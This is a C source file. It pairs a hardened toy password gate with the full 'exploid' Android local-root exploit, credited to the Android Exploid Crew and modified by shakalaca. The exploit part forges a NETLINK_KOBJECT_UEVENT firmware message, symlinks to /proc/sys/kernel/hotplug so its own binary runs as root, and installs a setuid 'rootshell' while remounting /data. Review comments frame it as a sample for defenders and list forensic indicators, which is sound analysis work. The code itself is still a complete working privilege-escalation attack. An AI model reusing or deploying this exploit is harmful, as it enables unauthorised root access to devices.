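/*
 * Drop the trailing newline that getline() and fgets() keep on a line, so the
 * comparison below is not defeated by the line ending. Safe on "" (no-op).
 */
static void strip_newline(char *s)
{
    size_t n = strlen(s);
    if (n > 0 && s[n - 1] == '\n')
        s[n - 1] = '\0';
}

/*
 * Equality of two NUL-terminated strings that does not stop at the first
 * differing byte: strcmp() returns as soon as the strings diverge, which
 * leaks how much of a guess matched. Returns 1 when equal, else 0.
 */
static int ct_str_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    size_t n = la > lb ? la : lb;
    unsigned char diff = (unsigned char)(la != lb);
    for (size_t i = 0; i < n; i++) {
        unsigned char ca = i < la ? (unsigned char)a[i] : 0;
        unsigned char cb = i < lb ? (unsigned char)b[i] : 0;
        diff |= (unsigned char)(ca ^ cb);
    }
    return diff == 0;
}

/*
 * Toy password gate: reads the expected password from "password.txt" (the
 * last line of the file wins, as before), prompts for an attempt on stdin and
 * calls rootshell() -- defined elsewhere -- when they match.
 *
 * Returns 0 after the comparison ran (match or not), 1 when password.txt is
 * unreadable or empty, or when stdin yields no input.
 *
 * Fixes against the original: strcpy() of an unbounded getline() result into
 * a 100-byte array and an unbounded stdin read both overflowed the stack
 * buffers; an empty file left real_pass uninitialised; `return;` in main
 * returned garbage.
 */
int main(void)
{
    char real_pass[100] = "";
    char user_pass[100] = "";
    char *buf = NULL;
    size_t cap = 0;

    /* get root password from file */
    FILE *source = fopen("password.txt", "r");
    if (source == NULL) {
        perror("fopen");
        printf("Unable to read password.txt!");
        return 1;
    }
    while (getline(&buf, &cap, source) > 0) {
        /* bounded copy: snprintf always NUL-terminates and truncates long lines */
        snprintf(real_pass, sizeof real_pass, "%s", buf);
    }
    free(buf);
    fclose(source);
    strip_newline(real_pass);
    if (real_pass[0] == '\0') {
        /* an empty expected password would accept an empty line -- refuse */
        fprintf(stderr, "password.txt is empty!\n");
        return 1;
    }

    /* get user's attempt, bounded to the buffer size */
    printf("enter root password: ");
    fflush(stdout);
    if (fgets(user_pass, sizeof user_pass, stdin) == NULL) {
        printf("incorrect password");
        return 1;
    }
    strip_newline(user_pass);

    if (ct_str_equal(real_pass, user_pass)) {
        printf("here comes a shell!\n");
        rootshell();
    } else {
        printf("incorrect password");
    }
    return 0;
}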
/*
 * NOTE(review): this is the "exploid" Android local-root exploit (see the
 * banner printed below), kept unchanged here as a sample for defenders.
 * Helpers die(), copy(), clear_hotplug() and rootshell() are defined elsewhere
 * in the file. Three runs are distinguished by the effective/real uid:
 *   - unprivileged run: pick a writable basedir, stage the files "loading",
 *     "hotplug" (containing this binary's path), "mount" and "fs_type"
 *     (from argv[1]/argv[2]), symlink "data" -> /proc/sys/kernel/hotplug and
 *     send one NETLINK_KOBJECT_UEVENT message naming that basedir. It appears
 *     to rely on the kernel's firmware-load path being triggered by a
 *     user-space uevent and writing "hotplug" through the "data" symlink --
 *     inferred from the payload below, not verified here;
 *   - euid 0: copy this binary as a mode-04711 "rootshell" into
 *     /sqlite_stmt_journals, /app-cache or /data/local/tmp and exit(1);
 *   - euid 0 but uid != 0 (the setuid copy was run): hand off to rootshell().
 * Forensic indicators visible in this code: the staged files and "data"
 * symlink in the basedir, a setuid "rootshell" in one of the three
 * directories above, and a remount of /data. The fix belongs to the
 * kernel/hotplug side (rejecting uevents from user-space senders); nothing
 * in this function is a fix.
 */
int main(int argc, char **argv, char **env)
{
	char buf[512], path[512], buf2[512];	/* buf2 is never used */
	int ofd, ifd;
	struct sockaddr_nl snl;
	struct iovec iov = {buf, sizeof(buf)};
	/* msg is assembled now but buf is only filled right before sendmsg() */
	struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
	int sock;
	char *basedir = NULL;
        int len;
        char path_fix[512];

        /* shakalaca: check if this program is called from UI or from CLI { */
	char pwd[128];

	/* pwd receives what stdin points at; "/dev/pts/" later means "run from a terminal" */
	memset(pwd, 0, sizeof(pwd));
	readlink("/proc/self/fd/0", pwd, sizeof(pwd));
        /* shakalaca: check if this program is called from UI or from CLI } */
	
 	/* I hope there is no LD_ bug in androids rtld :) */
	/* setuid copy running as root: hand off to rootshell() (defined elsewhere) */
	if (geteuid() == 0 && getuid() != 0)
		rootshell(env, argv);

	/* path = this binary's own location; it is what gets written to "hotplug" */
        memset(path, 0, sizeof(path));
	if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
		die("[-] readlink");

        len = strlen(path);
	/* drops a trailing byte above 127; only ever true where char is unsigned
	   (e.g. ARM) -- on signed-char targets this branch is dead */
        if (path[len - 1] > 127) {
          len--;
        }
        
	/* root run: install the setuid "rootshell" copy, then exit */
	if (geteuid() == 0) {
                char mp[128], fstype[16];
		clear_hotplug();

		/* strncpy does not terminate when len == strlen(path); the next line does */
                strncpy(path_fix, path, len);
                path_fix[len] = '\0';
                
		/* remount /system rw */
                /* shakalaca: read mount settings from file { */
		/*
		if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0)
			mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0);
                */
                /* test /sqlite_stmt_journals first */
                if ((ofd = creat("/sqlite_stmt_journals/test", 0644)) < 0) {
                  /* failed, try /app-cache or /data/local/tmp. either way should mount
                     /data first, in case failed */
                  /* shakalaca: check mount file and change to right directory */
                  /* locate the "mount" file staged by the unprivileged run and cd beside it */
                  if ((ifd = open("/sqlite_stmt_journals/mount", O_RDONLY)) < 0) {
                    if ((ifd = open("/data/local/tmp/mount", O_RDONLY)) < 0) {
                      if ((ifd = open("/data/data/com.corner23.android.universalandroot/files/mount", O_RDONLY)) < 0) {
                        die("[-] missing required files..");
                      } else {
                        close(ifd);
                        chdir("data/data/com.corner23.android.universalandroot/files/");
                      }
                    } else {
                      close(ifd);
                      chdir("/data/local/tmp");
                    }
                  } else {
                    close(ifd);
                    chdir("/sqlite_stmt_journals");
                  }
                  
                  /* mp / fstype are read raw: no NUL termination and no size check
                     beyond the buffer -- they are whatever argv[1]/argv[2] were earlier */
                  if ((ifd = open("mount", O_RDONLY)) < 0)
                          die("[-] open mount point");
                  if (read(ifd, mp, sizeof(mp)) < 0)
                          die("[-] read mount point");
                  close(ifd);

                  if ((ifd = open("fs_type", O_RDONLY)) < 0)
                          die("[-] open fs type");
                  if (read(ifd, fstype, sizeof(fstype)) < 0)
                          die("[-] read fs type");
                  close(ifd);

                  /* remount of /data: one of the observable side effects of a root run */
                  mount(mp, "/data", fstype, MS_REMOUNT, 0);
                  /* shakalaca: read mount settings from file } */
                    
                  /* 04711 = setuid + rwx--x--x: the persistent artefact to look for */
                  if ((ofd = creat("/app-cache/test", 0644)) < 0) {
                    copy(path_fix, "/data/local/tmp/rootshell");
                    chmod("/data/local/tmp/rootshell", 04711);
                  } else {
                    close(ofd);
                    unlink("/app-cache/test");
                    if (copy(path_fix, "/app-cache/rootshell") < 0) {
                      copy(path_fix, "/data/local/tmp/rootshell");
                      chmod("/data/local/tmp/rootshell", 04711);
                    } else {
                      chmod("/app-cache/rootshell", 04711);
                    }
                  }
                } else {
                  close(ofd);
                  unlink("/sqlite_stmt_journals/test");
                  copy(path_fix, "/sqlite_stmt_journals/rootshell");
                  chmod("/sqlite_stmt_journals/rootshell", 04711);
                }
		/* shakalaca: do not loop forever, it will eat cpu resource { */
		/* 
		for (;;); 
		*/
		exit(1);
		/* shakalaca: do not loop forever, it will eat cpu resource } */
	}

	/* unprivileged run from here on: stage files and send the uevent */
	printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
	printf("[*] Modified by shakalaca for various devices\n");

	/*
	basedir = "/sqlite_stmt_journals";
	if (chdir(basedir) < 0) {
		basedir = "/data/local/tmp";
		if (chdir(basedir) < 0)
			basedir = strdup(getcwd(buf, sizeof(buf)));
	}
	*/
	/* basedir selection: /sqlite_stmt_journals, else /data/local/tmp if writable,
	   else the app's files directory when not started from a terminal (pwd check) */
        basedir = "/sqlite_stmt_journals";
        if (chdir(basedir) < 0) {
                basedir = strdup(getcwd(buf, sizeof(buf)));
                if (chdir("/data/local/tmp") < 0) {
                        // Use from Android UI, fall back to project directory
                	if (strncmp(pwd, "/dev/pts/", 9) != 0) {
                                basedir = "/data/data/com.corner23.android.universalandroot/files";
                                if (chdir(basedir) < 0)
                                        die("[-] chdir");
                        }
                } else {
                        // test if it's writable
                        if ((ofd = creat("test", 0644)) < 0) {
                                if (strncmp(pwd, "/dev/pts/", 9) != 0) {
                                        // Use from Android UI, fall back to project directory
                                        basedir = "/data/data/com.corner23.android.universalandroot/files";
                                }
                                if (chdir(basedir) < 0) 
                                        die("[-] chdir");
                        } else {
                                basedir = "/data/local/tmp";
                                unlink("test");
                        }
                        close(ofd);
                }
        }
	
	printf("[+] Using basedir=%s, path=%s\n", basedir, path);
	printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");
	
	/* shakalaca: remove old data if possible { */
	unlink("data");
	unlink("hotplug");
	unlink("loading");
	unlink("mount");
	unlink("fs_type");
	/* shakalaca: remove old data if possible } */

	/* destination address: nl_pid 1 rather than the kernel's 0 -- a uevent
	   carrying a user-space origin like this is the thing to detect/reject */
	memset(&snl, 0, sizeof(snl));
	snl.nl_pid = 1;
	snl.nl_family = AF_NETLINK;

	if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
		die("[-] socket");

	/* staged artefacts in basedir: "loading" (empty, world-writable) and
	   "hotplug" holding this binary's path (first len bytes, no NUL) */
	close(creat("loading", 0666));
	if ((ofd = creat("hotplug", 0644)) < 0)
		die("[-] creat");
	if (write(ofd, path, len) < 0)
		die("[-] write");
	close(ofd);

	/* shakalaca: for remember mount device and filesystem type of /system { */
	/* argv[1]/argv[2] are written verbatim for the later root run; argc is
	   never checked, so a missing argument dereferences NULL here */
	if ((ofd = creat("mount", 0644)) < 0)
                die("[-] creat mount point");
        if (write(ofd, argv[1], strlen(argv[1])) < 0)
                die("[-] write mount point");        
        close(ofd);

	if ((ofd = creat("fs_type", 0644)) < 0)
                die("[-] creat fs type");
        if (write(ofd, argv[2], strlen(argv[2])) < 0)
                die("[-] write fs type");        
        close(ofd);
	/* shakalaca: for remember mount device and filesystem type of /system } */
	
	/* "data" symlink onto the hotplug helper sysctl; together with the
	   FIRMWARE/DEVPATH strings below this is the core of the technique and the
	   clearest on-disk indicator */
	symlink("/proc/sys/kernel/hotplug", "data");
	/* NUL-separated key=value pairs, as uevents are formatted; the buffer is
	   512 bytes, the whole of which is sent (iov covers sizeof(buf)) */
	snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
	         "SUBSYSTEM=firmware%c"
	         "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
	printf("[+] sending add message ...\n");
	if (sendmsg(sock, &msg, 0) < 0)
		die("[-] sendmsg");
	close(sock);
	printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
	       "[*] settings, plugin USB key etc.\n"
	       "[*] You succeeded if you find /system/bin/rootshell.\n"
	       "[*] GUI might hang/restart meanwhile so be patient.\n");
        sleep(1);
	return 0;
}